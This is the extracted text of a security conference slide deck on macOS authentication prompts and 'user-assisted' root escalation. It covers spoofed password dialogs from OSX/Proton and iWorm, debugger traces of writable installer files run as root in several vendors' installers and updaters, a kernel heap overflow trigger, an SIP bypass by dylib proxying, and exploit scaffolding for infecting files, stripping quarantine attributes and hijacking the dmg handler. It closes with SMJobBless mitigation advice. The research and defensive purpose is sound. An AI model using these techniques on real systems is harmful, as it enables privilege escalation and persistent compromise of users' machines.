 ASN:0x0-0xb00b-"SystemUIServer": ASN:0x0-0xc00c-"Dock": ... ASN:0x0-0x43043-"SecurityAgent": # lsmp -p 112 | grep SecurityAgent + send <- (1532) SecurityAgent send -> (1532) SecurityAgent send -> (1532) SecurityAgent + send-once <- (1532) SecurityAgent SecurityAgent: "an XPC service responsible for the UI" 
 -j levin XPC messages from authd to SecurityAgent int main() { AuthorizationItem right = {EXECUTERIGHT, ...}; AuthorizationRights inRights = { 1, &right }; AuthorizationCopyRights(auth, &inRights, NULL, kAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed, &outRights)) execv(pathToTool, (char *const *)restOfArguments); security_authtrampoline XPC authentication dialog password 'out of proc' #_ CORE ISSUES what's the problem(s)? trust no one! AM I LEGIT? vs. spoofed? system generated, albeit malicious? is the popup on the right: ...and wtf is Slack doing anyways!? legitimate (promise!) note: these not bugs/vulnerabilities osx/proton.b SPOOFING "OSX/Proton.B; a brief analysis, at 6 miles up" -objective-see.com/blog.html (lldb) po $rax <AuthorizationWindow: 0x10017f9f0> (lldb) po [$rax password] <NSSecureTextField: 0x10010bdb0> (lldb) po [[$rax password] stringValue] hunter2 100% fake handbrake.fr osx/proton.b 'auth' window code thanks for the password :/ ...but malicious 'LEGITIMATE' -(void)applicationDidFinishLaunching:(NSNotification *)aNotification { //create auth ref AuthorizationRef authRef;
 AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authRef); //exec with privs // ->will generated system auth popup AuthorizationExecuteWithPrivileges(authRef, "/path/to/evil/bin", kAuthorizationFlagDefaults, NULL, NULL);
 } slack's (real) icons creating a 'legit' auth popup #_ 'legit' auth popup copy into code example; iWorm 'LEGITIMATE' #.fs_usage.-w.-f.filesys. 20:28:28.727871..open. ../Library/LaunchDaemons/com.JavaW.plist.... 20:28:28.727890..write..B=0x16b.................................... int sub_1cf6() { *(int16_t *)(pathEnd) = "0/"; if (AuthorizationCreate(0x0, 0x0, 0x0, var_40C) == 0x0) { AuthorizationExecuteWithPrivileges(var_40C, path, 0x0, 0x0, 0x0); AuthorizationFree(var_40C, 0x0); } authentication prompt persistently installing osx/iworm installer's code infected apps '0' binary ...easy but dangerous (& deprecated) AUTHORIZATIONEXECUTEWITHPRIVILEGES AuthorizationRef authRef; AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authRef); AuthorizationExecuteWithPrivileges(authRef, "/path/to/binary", kAuthorizationFlagDefaults, NULL, NULL); #_ BetterAuthorizationSample: "Shows the recommended way to access privileged functionality from a non- privileged application on Mac OS X" -developer.apple.com } AuthorizationExecuteWithPrivileges local, non-priv'd, modifies binary! performs no validation on what it is executing (as root)!!! ...often perform unsafe actions! AUTHORIZED (PRIV'D) TOOLS #_ assume this is secure } load/execute 'unsecured' components create insecure temp files install 'unsecured' components but then... #_ 1 2 create:
 /tmp/blah.plist write:
 /tmp/blah.plist move to:
 /Library/LaunchDaemons/ 3 } local, non-priv'd, modifies plist! r00t! FINDING 0days 'user-assisted' priv-escalations ....everybody :( WHO CALLS AUTHORIZATIONEXECUTEWITHPRIVILEGES OSStatus AuthorizationExecuteWithPrivilegesExternalForm(const AuthorizationExternalForm * extForm, const char *pathToTool ...) { // report the caller to the authorities aslmsg m = asl_new(ASL_TYPE_MSG); asl_set(m, "com.apple.message.domain", "com.apple.libsecurity_authorization.AuthorizationExecuteWithPrivileges"); asl_set(m, "com.apple.message.signature", getprogname()); asl_log(NULL, m, ASL_LEVEL_NOTICE, "AuthorizationExecuteWithPrivileges!"); ... $.strings./private/var/log/DiagnosticMessages/*.|.grep.-A.1.AuthorizationExecuteWithPrivileges!.... $AuthorizationExecuteWithPrivileges!...................................................................................................... Slack. ...
 VMware.Fusion. Google.Chrome. Little.Snitch.Installer. osascript. Autoupdate.(Sparkle) lib/trampolineClient.cpp Console.app *.asl logs } vulnerable? q: is binary, passed to AuthorizationExecute... writable* by non-priv'd code? authentication attempts are logged is it writable? AUTHORIZATIONEXECUTEWITHPRIVILEGES() PAYLOAD AuthorizationExecuteWithPrivileges(authRef, "/sbin/reboot", kAuthorizationFlagDefaults, NULL, NULL); vs. AuthorizationExecuteWithPrivileges(authRef, "~/Downloads/Install.app", kAuthorizationFlagDefaults, NULL, NULL); world-writable, but exec'd as r00t #.procmon. new.process:.security_authtrampoline.(24977). path:./usr/libexec/security_authtrampoline. pid:.24977. args:. ..."~/Downloads/Install.app",. ...... process monitor 'security_authtrampoline' what is it exec'ing? } can non-priv'd code modify it? #.lldb.<path/to/app>. (lldb).b.AuthorizationExecuteWithPrivileges. (lldb).r. .... *.thread.#1:.Security`AuthorizationExecuteWithPrivileges
 stop.reason.=.breakpoint.1.1. (lldb).x/s.$rsi. 0x100000fa2:."~/Downloads/Install.app" debugger (lldb) often 'unsafe' things! WHAT DOES AUTHORIZED PROCESS (THEN) DO? #_ } load/execute 'unsecured' components create insecure temp files install 'unsecured' components #.fs_usage.-w.-f.filesystem.|.grep.Installer. stat64.../Library/LaunchDaemons/com.insecure.plist.......................Installer. access.../Library/LaunchDaemons/com.insecure.plist.......................Installer. rename...~/Downloads/Install.app/Contents/Resources/com.insecure.plist...Installer......................................................................................... chown..../Library/LaunchDaemons/com.blah.plist...........................Installer. file monitor Launch Daemons <key>RunAtLoad</key> <true/> <key>ProgramArguments</key> <array> <string>/Library/evil.bin</string> </array> plist (executed as r00t) persisted as r00t :/ plist BUGS if(no CVE) then 0day; dropcam INTERNET OF THINGS $.ls.-lart./var/folders/yx/bp25tm5x4l32k5297qwc7wcd4m022r/T/dropcam_kwvZ7y/Setup. Dropcam.(Macintosh).app/Contents/MacOS/Setup.Dropcam.(Macintosh). -rwxrwxrwx.1.patrick.staff..Setup.Dropcam.(Macintosh) permissions of (copied) installer $.lldb.Setup.Dropcam.(Macintosh).app. Launched.parent. Copying.Setup.Dropcam.(Macintosh).app.to./var/folders/yx/bp25tm5x4l32k5297qwc7wcd4m022r/T/dropcam_kwvZ7y. Launching.child.with.elevated.privileges.from./var/folders/yx/bp25tm5x4l32k5297qwc7wcd4m022r/T/ dropcam_kwvZ7y/Setup.Dropcam.(Macintosh).app/Contents/MacOS/Setup.Dropcam.(Macintosh). Process.96025.stopped.(Security`AuthorizationExecuteWithPrivileges). (lldb).x/x.$esp+8. 0xbffff6c4:.0x0020ac50. (lldb).x/s.0x0020ac50. 0x0020ac50:."/var/folders/yx/bp25tm5x4l32k5297qwc7wcd4m022r/T/dropcam_kwvZ7y/Setup.Dropcam. (Macintosh).app/Contents/MacOS/Setup.Dropcam.(Macintosh)" copy & exec (auth'd) installer from tmp dir! #_ google chrome BROWSERS #.procmon. new.process:.security_authtrampoline.(1508). path:./usr/libexec/security_authtrampoline. pid:.24977. args:. ..."/Applications/Google.Chrome.app/Contents/Versions/59.0.3071.115/Google.Chrome.Framework.framework/Resources/keystone_promote_preflight.sh",. ...... process monitor keystone_promote_preflight.sh } bash script owned by user -rwxr-xr-x@ 1 user executed as r00t [bug 593133] "AuthorizationExecuteWithPrivileges is deprecated ...as per discussion no good replacement exists" #wontfix (non-admin) install little snitch SECURITY TOOLS big snitch ;) Launch Daemons 1 2 3 plist 2 3 firewall is elevated writes a plist to temporary (user-writable) location moves plist into launch daemons & chowns it to r00t } installer/updater: <key>RunAtLoad</key> <true/> <key>ProgramArguments</key> <array> <string>/path/2/lsdaemon</string> </array> editable by all! 1 little snitch SECURITY TOOLS (lldb).b.ptrace. Breakpoint.1:.=.libsystem_kernel.dylib`__ptrace. (lldb).br.com.add.1. Enter.your.debugger.command(s)... >.thread.return.. >.continue. >.DONE. disable anti-debug char -[ODShell writePlist:owner:mode:toFile:] { ... r14 = [NSTemporaryDirectory() stringByAppendingPathComponent: [NSString stringWithFormat:@"at.obdev.LittleSnitchInstaller.temp.%@.plist", [arg5 lastPathComponent]]]; [arg2 writeToFile:r14 atomically:0x0]; } move plist & chown (lldb).b..-[ODShell._executeCommandAsRoot:]. (lldb).*.thread.#1:.-[ODShell._executeCommandAsRoot:]
 stop.reason.=.breakpoint.1.1. (lldb).po.$rdx. echo.$$;.{./bin/rm.-f."$PLIST";./bin/mv."$TMPFILE"."$PLIST";./usr/sbin/chown.root:wheel."$PLIST";./bin/chmod.0644."$PLIST";.}.2>&1. (lldb).po.[[NSProcessInfo.processInfo].environment]. PLIST.=."/Library/LaunchDaemons/at.obdev.littlesnitchd.plist";. TMPFILE.=."/var/folders/hp/vv2sj3014271lklmjkyfjfl80000gn/T/ at.obdev.LittleSnitchInstaller.temp.at.obdev.littlesnitchd.plist.plist"; save plist to temporary location patched: CVE-2017-2675 vmware fusion VIRTUALIZATION SOFTWARE (lldb).b.AuthorizationExecuteWithPrivileges. * thread.#1:.Security`AuthorizationExecuteWithPrivileges. * stop.reason.=.breakpoint.1.1. frame.#0:.0x00007fff928cef77.Security`AuthorizationExecuteWithPrivileges. (lldb).x/s.$rsi. "/var/folders/yx/bp25tm5x4l32k5297qwc7wcd4m022r/T/fusionAutoupdate.JuFYAU/preflight". $.ls.-lart./var/folders/yx/bp25tm5x4l32k5297qwc7wcd4m022r/T/fusionAutoupdate.JuFYAU/preflight. -r-xr-xr-x..1.user..staff #_ scripts extracted to temp (user-writable) directory executed as r00t } executing world-writable scripts...as r00t f-secure freedome VPN SOFTWARE #.procmon. new.process:.security_authtrampoline.(2580). path:./usr/libexec/security_authtrampoline. pid:.24977. args:. ..."/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid",. ...."auth.11",. ...."/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid",. ...."/bin/sh",. ...."-c",. ...."sh.'/Applications/Freedome.app/Contents/Resources/install_or_update_plists.sh'.'/Applications/Freedome.app'" process monitor: 'install_or_update_plists.sh' SettingsManager::createConfigsAndReinstallDaemonIfNeeded { ... lea rdi, "do shell script "%1" with administrator privileges" ... lea rdi, "osascript" ... lea rdi, "-e" ... call QProcess::start(QString const&,QStringList const&, ...) } freedome's disassembly exec script as root, via applescript sophos av ANTI-VIRUS $.lldb."~/Downloads/SophosInstall/Sophos.Installer.app". Current.executable.set.to.'~/Downloads/SophosInstall/Sophos.Installer.app'.(x86_64).. (lldb)..b.AuthorizationExecuteWithPrivileges. (lldb).r. * thread.#1:.Security`AuthorizationExecuteWithPrivileges. * stop.reason.=.breakpoint.1.1. frame.#0:.0x00007fff928cef77.Security`AuthorizationExecuteWithPrivileges. (lldb).x/s.$rsi. 0x105b56f70:."~/Downloads/SophosInstall/Sophos.Installer.app/Contents/MacOS/tools/InstallationDeployer". (lldb).x/2x.$rcx. 0x7fff5fbfebe0:.0x0000000100031477.0x0000000100031481. (lldb).x/s.0x0000000100031477. 0x100031477:."--install". (lldb).x/s.0x0000000100031481. 0x100031481:."--ui" SophosInstall.zip InstallationDeployer --install --ui #_ sparkle; ...used lots AUTO-UPDATE LIBRARY ! "Apps using Sparkle" github.com/sparkle-project/Sparkle/issues/717 Acorn Activity Audit Adapter Adium Air Display Host Air Video Server HD AirParrot 2 AirRadar AirServer Airfoil Airfoil Speakers Airfoil Video Player Alarm Clock Pro Alarm Clock Pro 2 Ambify Antidote 8 AppCleaner AppDelete AppViz AppZapper Archiver Art Text 2 Audio Hijack Audio Hijack Pro Audiomate Audirvana Plus Bartender Bartender 2 Battery Guardian Battery Report BeadedSpice Beamer Bento 3 BetterTouchTool BetterZip BibDesk Billings Bit Slicer BitTorrent Bitcasa Bittorrent Sync Bleep Blue Jeans Scheduler for Mac BoinxTV BootXChanger Borderlands Bowtie Boxer Bricksmith CCMenu CDpedia Cactus Cakebrew Camtasia 2 Capo Carbon Copy Cloner Carousel Cathode Chatology CheatSheet Chicken ChitChat Chocolat Cinch Cisco Jabber ClamXav CleanMyMac 2 Clippy CloudApp CloudyTabs Clyppan Cocktail CocoaPods Coconut ID CocosBuilder Coda 2 CodeKit CodeRunner Colloquy ColorFinale ColorMunki Display ColorMunki Smile Comic Life Conductr Server Contour ControlPlane ControllerMate CopyClip Core Data Editor Corel Painter Sketch Pad Cornerstone CoverScout 3 Crashlytics CrossOver Crunch Cyberduck DEVONthink DEVONthink Pro DS_Store Cleaner DaisyDisk Dash Dashlane Data Rescue 3 Default Folder X Deploymate DesignPro Deskovery Desktop Curtain DesktopShelves Disk Drill DiskAid DiskMaker X DockMod Downie DrawBerry Drive Genius 3 DropZone 3 DropletManager Dropshare Dropzone-2 DuetDisplay + DynDNSUpdater Elmedia Player Eloquent Ember Enjoy2 Evernote Evom Exhaust Fabric Fake Fantastical Feeder Feeder 3 Festify Final Vinyl FinderPath Fitbit Connect Flashlight Flavours2 FlexiGlass Fluid Flux Focus Focus 2 Font Finagler FontAgent Pro 6 FontStand ForkLift FotoMagico Fraise Framer Studio GPG Keychain GeekTool Geekbench Geekbench 3 Get Backup 2. Get iPlayer Automator GitUp Gitbox Gitter Glyphs Go2Shell Goofy GraphicConverter 7 GraphicConverter 8 GraphicConverter 9 GridMount GrowlMail Hammerspoon Handbrake Harvest Hedgewars Hex Fiend HipChat Hirundo Hobo Hocus Focus Hopper Hopper Disassembler v3 Hopper/Hopper Debugger Server HoudahGeo HoudahSpot Hypernap iExplorer iFunBox iPhone Backup Extractor iPhone Explorer iPlayer Automator iSale 5 iShowU HD iSkysoft iTube Studio iStopMotion iStumbler iSubtitle iTeleport Connect iTerm iTerm-2 iTools iVPN IP Scanner IPNetMonitor X IconJar Image2Icon ImageAlpha ImageOptim Impactor InVisible Infinit Inklet InsomniaX Intensify Pro Isolator Itsycal JPEGmini Pro JewelryBox JollysFastVNC Jumpcut Kaleidoscope Karabiner KeepingYouAwake Keka Kext Wizard KisMAC Knock LaTeXiT Last.fm LevelHelper LineIn LiquidCD LiteIcon Live Interior 3D Pro LiveReload Loading Lookback Loop Editor Lumio Lyve M3Unify MAMP MDRP MPEG2 Works 4 MPlayer OSX Extended MPlayerX MTR 5 MacDown MacJournal MacPilot MacVim Mactracker Mailbox MediaInfo Mac MenubarStats Messenger MetaZ Minbox MindNode Pro Minitube Miro Miro Video Converter Money MongoHub Monodraw Monolingual Mou Mou + MouseRecorder MoveToAppleMusic MyHarmony Myo Connect Name Mangler NameChanger NetNewsWire NetSpot NiceCast Notational Velocity NoteBook Notifyr Noun Project OSCulator OSCulator ƒ Octohub Octopus Opacity OpenDNS Updater 3.0 OpenEmu PDFpen Pacifist PaintCode PaintCode 2 Paintbrush Panda Mac Paparazzi! Paperless Paw Phone To Mac PhoneExpander PhoneView PhotoPresenter Phun PhysicsEditor Picturesque Piezo Platypus PlistEdit Pro Plug Poedit Power Manager Power Manager Professional PowerPhotos PowerTunes ProjectPlus PwnageTool QuickRadar Quicken 2007 Quicken 2016 Quinn Radium Rdio RealPlayer Cloud Reeder Reflector Reflector 2 Reggy Remote Activity RescueTime Retrode Utility Reveal RightFont Ring Rinoceros RipIt RoadMovie RoboFont S3Hub SMART Utility 2.1.2 SafariCacheExplorer Sandvox SaneDesk Scapple ScreenFlow Scrivener Seil SelfControl Senuti Sequel Pro Shapes Sharepod Sidestep Silverback Simple Comic Simul80 SizeUp Sketch Sketch Toolbox Skim SkyFonts Slack Sleep Monitor Snagit Snapheal Snapheal PRO Sofortbild SongGenie Soulver Sound Studio SoundSoap SourceTree SousChef Spark Splashtop Splice Stand Stay StoryMill StuffIt Expander Subler Subliminal Submerge Swift Publisher 3 TCMPortMapper TG Pro Tagalicious Tagger Tansmit TeX Live Utility TeXnicle TeamViewer TechTool Pro 8 Teleport TexShop Textual TexturePacker The Unarchiver Throng Timing Toast 14 Titanium Toast Titanium Tokens Tomahawk Tonality Pro Tower Trailer Trampoline Transmission Transmit Trello TripMode Triumph TunesKit for Mac TunnelBear Tunnelblick TurboTax 2012-2015, at least TwistedWave Twitterrific Typora uTorrent UnRarX UnicodeChecker Unison Übersicht VLC VLS Vagrant Manager VelOCRaptor Versions VideoMonkey VideoSpec Vienna Viscosity VisualHub Vitamin-R Vivaldi Vox VyprVPN Wallsaver Waltr WebKit WhatSize Whiskey Winclone Wine WineBottler WireTap Studio Witgui Wondershare AllMyTube Wondershare Data Recovery Wondershare Video Converter Ultimate X-LosslessDecoder XLD XQuartz Xslimmer Yarg Yate ZFS Plugin Zeplin Zoom Zulip Zwoptex oh f**k list from 2016 app (to be vulnerable) must use recent ver. of sparkle user an example; hopper.app SPARKLE time to update! (lldb).process.attach.--name.Autoupdate.--waitfor
 Executable.module.set.to."/Users/user/Library/Caches/com.cryptic-apps.hopper-web-4/org.sparkle- project.Sparkle/Autoupdate.app/Contents/MacOS/Autoupdate".. (lldb).b.AuthorizationExecuteWithPrivileges. Process.15771.stopped. Security`AuthorizationExecuteWithPrivileges:. (lldb).x/s.$rsi. "/Users/user/Library/Caches/com.cryptic-apps.hopper-web-4/org.sparkle-project.Sparkle/ Autoupdate.app/Contents/MacOS/fileop update server Autoupdate.app fileop fileop modifiable by un-priv'd code } executed as r00t user hijacking auth'd copies AND APPLE? user authenticates item (naively) copied } Slack.zip ...into /Applications $.shasum.-a.1.~/Downloads/Slack.app/Contents/MacOS/Slack. 0a05ccc21943b543dd0326a7b5f7918d881d67f6. $.xattr.-rc.~/Downloads/Slack.app. $.cat.-.>>.~/Downloads/Slack.app/Contents/MacOS/Slack.. AAAAA^C. $.shasum.-a.1./Applications/Slack.app/Contents/MacOS/Slack.. 8e605dad6112b601bbdd085dd0d3b97d5a1905e6. $.ps.aux.|.grep.Slack.app. user...17150.../Applications/Slack.app/Contents/MacOS/Slack 'infected' Slack runs ...for any user no verification, that the item wasn't modified user Installer.app AND APPLE? $.codesign.-d.--entitlements.-./System/Library/CoreServices/Installer.app.. Executable=/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer. <?xml.version="1.0".encoding="UTF-8"?>. <plist.version="1.0">. <dict>. . <key>com.apple.private.securityd.stash</key>. . <true/>. </dict>. </plist>. app's entitlements authentication handler for .pkgs $.less./System/Library/CoreServices/Installer.app/Contents/Info.plist. <key>CFBundleDocumentTypes</key>. <array>. ...<dict>. ....<key>CFBundleTypeExtensions</key>. ....<array>. .....<string>pkg</string>. ....</array>. ....<key>LSIsAppleDefaultForType</key>. ....<true/>. ............................ ...</dict>. ... default .pkg handler Installer.app loads unsigned dylibs?? AND APPLE? /Plugins (lldb).process.attach.--name.Installer.--waitfor. Process.460.stopped. Foundation`-[NSFileManager.createDirectoryAtPath:. ..............withIntermediateDirectories:attributes:error:]. (lldb).po.$rdx. /tmp/com.apple.installerie9PZNtz/FollowUs.bundle. .... Process.460.stopped. libdyld.dylib`dlopen. (lldb).x/s.$rdi. "/tmp/com.apple.installerie9PZNtz/FollowUs.bundle installer doing what!? /tmp $.ls.-lart./tmp/com.apple.installerie9PZNtz/FollowUs.bundle. -rwxr-xr-x..1.user..staff /tmp is writeable! unsigned dylib; loaded :/ BEYOND ROOT subverting 's OS installer #.tail.-f./var/log/install.log. InstallAssistant:.Blessing./Volumes/Macintosh.HD.--.. /Volumes/Macintosh.HD/macOS.Install.Data. InstallAssistant:.******.Setting.Startup.Disk.******. InstallAssistant:.******.Path:./Volumes/Macintosh.HD. InstallAssistant:.******.Boot.Plist:./Volumes/Macintosh.HD/macOS.Install.Data/com.apple.Boot.plist. InstallAssistant:./usr/sbin/bless.-setBoot.-folder./Volumes/Macintosh.HD/. macOS.Install.Data.-bootefi./Volumes/Macintosh.HD/macOS.Install.Data/boot.efi.-options.config="\macOS. Install.Data\com.apple.Boot".-label.macOS.Installer. Install macOS Sierra.app InstallESD.dmg 'new' os codesign.-d.--entitlements.-./Applications/Install\.macOS\. Sierra.app/Contents/Frameworks/OSInstallerSetup.framework/ Versions/A/Resources/osishelperd. <plist.version="1.0">. ...<dict>. ......<key>com.apple.private.securityd.stash</key>. ......<true/>. ......<key>com.apple.rootless.install</key>. ......<true/>. ......<key>com.apple.rootless.install.heritable</key>. ......<true/>. ...</dict>. </plist> blessing, to boot off InstallESD.dmg osishelperd's entitlements subverting 's OS installer BEYOND ROOT once the system is booted of an infected image, all 'OS-level' protections are irrelevant create malicious library that forwards exports to (re-named) dylib rename dependent dylib move/rename malicious library to match (original) dylib 1 2 3 'dylib proxying' IASUtilities IASUtilities_ORIG OS Installer unless entitled runtime 'injection' into OS Installer subverting 's OS installer BEYOND ROOT Install macOS Sierra.app osishelperd #.ps.aux.|.grep.-i.[j]ava. root...90.../Library/Application.Support/JavaW/JavaW. #.less./System/Library/LaunchDaemons/com.JavaW.plist. ..<key>ProgramArguments</key>. ..<array>. ....<string>/Library/Application.Support/JavaW/JavaW</string>. ..</array>. ..<key>RunAtLoad</key>. ..<true/>. #.rm./System/Library/LaunchDaemons/com.JavaW.plist. rm:.Operation.not.permitted osishelperd blesses infected images within installer app, infect os image (.dmg) system boots of infected image to reinstall OS 1 2 3 the attack: not validated ! bypass SIP survive an OS upgrade CVE-2017-6974 dylib proxy a ring-0 heap overflow BEYOND ROOT void audit_arg_sockaddr(struct kaudit_record *ar, struct vnode *cwd_vp, struct sockaddr *sa) { int slen; struct sockaddr_un *sun; bcopy(sa, &ar->k_ar.ar_arg_sockaddr, sa->sa_len); switch (sa->sa_family) { case AF_UNIX: ... } struct kaudit_record { struct audit_record k_ar; u_int32_t k_ar_commit; ... }; struct audit_record { u_int32_t ar_magic; int ar_event; int ar_retval; ... struct sockaddr_storage ar_arg_sockaddr; int ar_arg_fd2; ... }; #define _SS_MAXSIZE 128 struct sockaddr_storage { u_char ss_len; sa_family_t ss_family; char __ss_pad1[_SS_PAD1SIZE]; int64_t __ss_align; char __ss_pad2[_SS_PAD2SIZE]; }; relevant structs bcopy() in audit_arg_sockaddr() source ('src'): struct sockaddr *sa destination ('dst'): struct sockaddr_storage k_ar.ar_arg_sockaddr audit_arg_sockaddr() bytes to copy ('len'): sa->sa_len ring-0 heap overflow BEYOND ROOT can we make socket > _SS_MAXSIZE? #define SOCKET_SIZE 200 //create unix socket int unixSocket = socket(AF_UNIX, SOCK_STREAM, 0); //alloc/fill char* addr = malloc(SOCKET_SIZE); memset(addr, 0x41, SOCKET_SIZE); //init (addr)->sun_len = SOCKET_SIZE; (addr)->sun_family = AF_UNIX; //bind bind(unixSocket, addr, SOCKET_SIZE)); (lldb).x/xb.0xffffff801a4c26f8. 0xffffff801a4c26f8:.0xfa.0x01.0x41.0x41.0x41.0x41.0x41.0x41. 0xffffff801a4c2700:.0x41.0x41.0x41.0x41.0x41.0x41.0x41.0x41...... (lldb).x/i.$pc. ->.0xffffff80063eb6da:.48.8b.00.movq.(%rax),.%rax. (lldb).reg.read.$rax. rax.=.0x4141414141414141 kernel ptr = 0x4141414141414141 unix socket (200 bytes) patched 10.12.4/iOS(?) (AFAIK, no CVE/credit) yes! EXPLOITS making these useful efficient exploitation, as limited-priv'd code GENERAL OVERVIEW 2 3 1 4 if(vulnerable app) then { watch for 'vulnerable' file } then { infect 'vulnerable' file } enjoy r00t! #_ go time! watch for vulnerable application APP MONITOR 1 -(void)register4Notifications { //register for 'app launched' notification [[[NSWorkspace sharedWorkspace] notificationCenter] addObserver:self selector:@selector(appEvent:) name:NSWorkspaceDidLaunchApplicationNotification object:nil]; //register for 'app terminated' notification [[[NSWorkspace sharedWorkspace] notificationCenter] addObserver:self selector:@selector(appEvent:) name:NSWorkspaceDidTerminateApplicationNotification object:nil]; } -(void)appEvent:(NSNotification *)notification { //app name NSString* app = notification.userInfo[@"NSApplicationName"]; //ignore apps we don't care about if(YES != [app isEqualToString:TARGET_APP]){ //bail goto bail; } //launched if(YES == [notification.name isEqualToString:@"NSWorkspaceDidLaunchApplicationNotification"]){ //start monitoring // ->wait for vulnerable file } //exited else { //stop monitoring } .... } application start/stop monitor watch for vulnerable file (!polling) FILE MONITOR 2 -(void)register4Notifications { CFStringRef path = CFStringCreateWithCString(kCFAllocatorDefault, TARGET_FILE, kCFStringEncodingUTF8); CFArrayRef paths = CFArrayCreate(NULL, (const void **)&path, 1, &kCFTypeArrayCallBacks); CFRunLoopRef loop = CFRunLoopGetCurrent() ; FSEventStreamRef stream = FSEventStreamCreate(NULL, (FSEventStreamCallback)eventCallback, NULL, paths, kFSEventStreamEventIdSinceNow, 0, kFSEventStreamCreateFlagFileEvents ); FSEventStreamScheduleWithRunLoop(stream, loop, kCFRunLoopDefaultMode); FSEventStreamStart(stream); CFRunLoopRun(); ... } void eventCallback(FSEventStreamRef stream, void* callbackInfo, size_t numEvents, void* paths, const FSEventStreamEventFlags eventFlags[], const FSEventStreamEventId eventIds[]) { //process events for(int i = 0; i<numEvents; i++){ //item creation event? if(0 != (eventFlags[i] & 0x100 )){ //target file created // ->hijack/infect } } FSEventStreamFlushSync( stream ) ; file monitor infect script/plist/binary...root! FILE INFECTION 3 } scripts/plists } machO binaries remove xattrs (avoid gKeeper validations) unsign don't we have to win a race? # 'massive' time window ...always win :) yes, but.... side-stepping 'app translocation' MAKING TARGETS WRITABLE write-only 'app translocation' } CVE 2015-3715 (wardle) CVE 2015-7024 (wardle) testApp:...app.is.translocated!. testApp:...original.URL:.~/Downloads/testApp.app/. testApp:...translocated.URL:.file:///private/var/folders/r3/9nbl60856zn82n6wdtwrxw8w0000gn/T/ AppTranslocation/7E2258D4-DD10-4B39-B659-F9C9C1CC7A9F/d/testApp.app/ translocated app $.xattr.~/Downloads/targetApp.zip. .... com.apple.quarantine. $.xattr.-rc.~/Download/targetApp.zip 1 2 remove xattrs prevents translocation (writable) prevents gatekeeper validation intercepting .dmg mounts to achieve R/W MAKING TARGETS WRITABLE write-only (/Volumes) .dmg $.less.~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist. <?xml.version="1.0".encoding="UTF-8"?>. <plist.version="1.0">. <dict>. .<key>LSHandlers</key>. .<array>. .<dict>. ...<key>LSHandlerContentType</key>. ...<string>com.apple.disk-image-udif</string>. ...<key>LSHandlerPreferredVersions</key>. ...<dict>. ......<key>LSHandlerRoleAll</key>. ......<string>-</string>. ....</dict>. ....<key>LSHandlerRoleAll</key>. ....<string>com.company.evilHijacker</string>. .</dict>. .</array>. </dict>. </plist> com.apple.launchservices.secure.plist -(BOOL)application:(NSApplication *)sender openFile:(NSString *)filename { //mount .dmg as R/W! NSTask *task = [[NSTask alloc] init]; task.launchPath = @"/usr/bin/hdiutil"; task.arguments = @[@"attach", filename, @"-shadow", @"-noverify"]; [task launch]; [task waitUntilExit]; //open in Finder.app [[NSWorkspace sharedWorkspace] openFile:@"/Volumes/<mount point>/"]; return YES; } .dmg writable :) default handler vmware installer/updater EXPLOIT: google chrome EXPLOIT: 's Installer EXPLOIT: 1 2 3 expand pkg $ pkgutil --expand cp evil.bundle installMe/Plugins flatten pkg & replace $ pkgutil --flatten system popup from within Installer.app } fake popup piggy-back off legit one or response: *crickets* :( malicious dylib in Installer.app CONCLUSIONS wrapping this up scare me! Why? AUTHENTICATION DIALOGUES 1 2 3 trivial to spoof invoked via insecure APIs trusted/privileged code often insecure } on my box :/ #_ end result :( stop being so lame! MALWARE AUTHORS infect trojan email exploits } 1 watch & wait 2 or so many targets! any .pkg? exploit 3 #_ 4 r00t! ...use SMJobBless! (MORE)SECURE INSTALLS "SMJobBless()" <key>SMPrivilegedExecutables</key> <dict> <key>com.company.HelperTool</key> <string>identifier "com.company.HelperTool" and (certificate leaf[field. 1.2.840.113635.] .... and certificate leaf[subject.OU] = <teamIdentifier>) </string> </dict> Contents/Library/LaunchServices/ helper tool app's Info.plist service management daemon (smd) helper tool /private/var/run/com.apple.xpc.smd/ PrivilegedHelperToolStaging helper tool /Library/PrivilegedHelperTools launchd plist /Library/LaunchDaemons } as root verified } verifies 'secure' 2 3 1 4 ...use SMJobBless! (MORE)SECURE INSTALLS AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &self->authRef); AuthorizationItem authItem = { kSMRightBlessPrivilegedHelper, 0, NULL, 0 }; AuthorizationRights authRights = { 1, &authItem }; AuthorizationFlags flags = kAuthorizationFlagDefaults | kAuthorizationFlagInteractionAllowed | kAuthorizationFlagPreAuthorize | kAuthorizationFlagExtendRights; AuthorizationCopyRights(self->authRef, &authRights, kAuthorizationEmptyEnvironment, flags, NULL); /* This does all the work of verifying the helper tool against the application * and vice-versa. Once verification has passed, the embedded launchd.plist * is extracted and placed in /Library/LaunchDaemons and then loaded. The * executable is placed in /Library/PrivilegedHelperTools. */ SMJobBless(kSMDomainSystemLaunchd, (CFStringRef)@"com.someCompany.HelperToolBundleID", self->authRef, &error); apple's "SMJobBless.zip" } ...but "The calling application & target executable tool must both be signed" -apple persistently installs a launch daemon (that must delete itself!) "You cannot specify your own program arguments" -apple (implement XPC) SMJobBless() in code #unload helper tool's launch daemon sudo launchctl unload /Library/LaunchDaemons/ com.company.HelperTool.plist #delete helper tool's launch daemon plist sudo rm /Library/LaunchDaemons/ com.company.HelperTool.plist #delete helper tool binary sudo rm /Library/PrivilegedHelperTools/HelperTool uninstall logic free security tools! OBJECTIVE-SEE(.COM) KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr RansomWhere? support it :) www.patreon.com/objective_see contact me any time :) QUESTIONS & ANSWERS @patrickwardle patrick@synack.com www.synack.com/red-team join the red team! patreon.com/objective_see speakerdeck.com/patrickwardle mahalo :) CREDITS - FLATICON.COM - ICONMONSTR.COM - ICONEXPERIENCE.COM - HTTP://WIRDOU.COM/2012/02/04/IS-THAT-BAD-DOCTOR/ - HTTP://TH07.DEVIANTART.NET/FS70/PRE/F/ 2010/206/4/4/441488BCC359B59BE409CA02F863E843.JPG 
